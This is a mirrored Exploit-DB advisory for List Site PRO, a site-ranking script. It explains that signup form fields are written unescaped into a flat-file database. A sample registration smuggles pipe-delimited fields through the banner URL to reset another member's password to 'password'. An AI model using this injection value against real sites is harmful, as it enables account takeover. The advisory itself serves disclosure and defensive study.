bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/22201.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
652 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/6685/info
List Site PRO is a top site ranking system that counts hits from member sites and then ranks them according to the number of hits.
A problem has been reported for List Site PRO that would allow an attacker to inject arbitrary values via html input form fields into the underlying flat-file database used by List Site PRO.
A malicious user could sign up like this:
username:username
email:email@emial.com
url:www.url.com
bannerurl:www.site.com/banner.gif ||password|%User_ID%|60|468
banner height:68
banner width:460
password:pass
To reset the sites,specified by %User_ID%,password to 'password'.
Reference in a new issue View git blame Copy permalink